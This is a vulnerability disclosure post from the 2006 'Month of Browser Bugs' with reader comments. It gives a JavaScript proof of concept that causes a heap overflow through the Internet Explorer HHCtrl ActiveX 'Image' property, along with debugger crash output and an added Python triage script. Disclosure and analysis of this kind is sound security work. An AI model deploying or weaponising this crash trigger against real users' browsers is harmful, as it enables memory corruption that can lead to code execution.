MoBB #2: Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
Demonstration
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
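As an added triage example (not part of the original post), the following Python parses the debugger output above and checks whether any register or the faulting address lies within a few bytes of 0x58585858, the script's "X" fill character repeated. The 16-byte tolerance and all function names are assumptions of this example.

```python
import re

# Debugger output copied verbatim from the post above.
DUMP = """\
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
"""

FILL = "X"   # fill character used by the post's script ("XXXX")
SLACK = 16   # assumed tolerance for small offsets applied to a pointer


def parse_dump(text):
    """Return (registers, fault_address) from WinDbg-style output."""
    regs = {name: int(val, 16)
            for name, val in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", text)}
    # "ds:0023:58585855=??" is the effective address; "??" means unreadable.
    m = re.search(r"\b[c-gs]s:[0-9a-f]{4}:([0-9a-f]{8})=\?\?", text)
    return regs, (int(m.group(1), 16) if m else None)


def pattern_word(fill):
    """32-bit value made of the fill byte repeated, e.g. 'X' -> 0x58585858."""
    return int.from_bytes(fill.encode("latin-1") * 4, "little")


def tainted(value, fill=FILL, slack=SLACK):
    """True if value lies within `slack` bytes of the repeated fill word."""
    return value is not None and abs(value - pattern_word(fill)) <= slack


def triage(text, fill=FILL):
    """Report which registers and fault address track the input pattern."""
    regs, fault = parse_dump(text)
    hits = sorted(r for r, v in regs.items() if tainted(v, fill))
    return {"tainted_registers": hits,
            "fault_address": fault,
            "fault_tainted": tainted(fault, fill)}


if __name__ == "__main__":
    print(triage(DUMP))
```

A hit on both `esi` and the unreadable address means the heap allocator dereferenced a pointer built from the page's own string data, which is what separates this crash from an ordinary null dereference.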
This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.
38 Comments:
IE-6 SP1 (the latest) didn't do anything. It was NOT crashing! Security level for the Internet Zone was set on HIGH (recommended).
System: Windows XP home SP2.
IE6 seems unaffected by this code with Win2K as the OS.
IE7 beta 2 on Windows Vista build 5384 was also unaffected. It asked if I wanted to execute the script, and nothing happened after allowing it.
IE 6.0.2800.1106 on xpsp.1020828-1920
no crash:
Internet zone was very low
Browser crashing... ;)
Crashed mine
6.0.2900.2180
No crash here :)
cool, exploitable one :)
It crashes my IE6 with win2k OS. does not affect firefox at all.
It does crash when you change your security settings. When you switch it to "high" it won't crash, but when you switch it to "low" it will crash. However, my browser did crash :-) (WinXP SP2).
IE7 Beta 3 (7.0.5450.4) crashed on windows xp sp2.
IE-6 SP2 on winXP crashes
IE6 SP2 on WinXP crashes
Also this exploit requires explicit ActiveX installation, so it's not dangerous. With IE6 SP2 or greater you have a big warning by the info bar
Windows XP, totally unpatched.
No Service Packs for windows or IExplorer. Does not crash.
IE7 beta 3 on Windows XP SP2 was also unaffected.
Didn't crash IE-7 on XP pro SP2.
IE7 beta 3 crashes, those with the beta claiming it doesn't are doing it wrong.
No Crash Here - Except an ERROR ON PAGE was displayed -> Automation Server failed to create object or something like that ... maybe there's certain conditions - I'm default security settings with prompt for all cookies, immunised by Spybot S&D + Spywareblaster with TeaTimer protection and a Pop-up Stopper.
IE on XP SP2, demo didn't work. I got a JavaScript error right after clicking the "start demo" button: "Automation server can't create object", "Line 5", "Char 2".
FWIW, I have SpywareBlaster installed, SpyBot installed with "TeaTimer" running and "Immunize" area fully enabled. I'm running KAV6 AV, Sygate Pro firewall.... if any of that has anything to do with blocking the exploit test code example.
-Clint
In Windows 98, my browser didn't crash
No problems with IE 7 (Beta3) running on XP
Crashed mine with IE6-sp2
Had no crash on XP SP2 with IE6 SP2 not updated with more patches after.
No crash/effect on XP2 IE6 SP2 (no further patches).
No crash with XP, No Services Pack in windows, No Services Pack in IE. :/
Crashed IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
Cipher Strength: 128-bit
SP2.
2 errors and force to shut down IE.
No effect on FireFox.
OS= XP SP2 ALL current MS patches.
Anyone have evidence that this will allow shellcode execution, or is this simply a DoS vulnerability?
IE7 Beta crashes
me love IE , BrowserFun is huge Fun
Thanks HD
Me love IE ,
Browser Fun is a Huge fun
Thank you HD
IE7 beta3 crash
Crashed Mine !!
IE7 beta 3 NO CRASH! The ones who are saying it does crash are probably MS bashers.
Anyone reporting "NO CRASH" on IE 7 is mistaken - the vulnerability is still there, it just requires ActiveX to be enabled for it to trigger.
This bug affects BOTH IE6 and IE7!
IE7, however, requires the user to click the information bar and consent to allowing the HtmlHelp control to be accessed.
I have been using IE7 Beta 1 for some time as my primary browser; been very pleased, odd crash, but what would you expect from the first release.
But I have just upgraded to IE7 Beta 3 and find that sometimes it quits (or crashes) out with no errors. Any ideas?
Something weird I didn't figure out is another error, check this website: http://www.tvalentejo.tv
always crashing when we try to change to other videos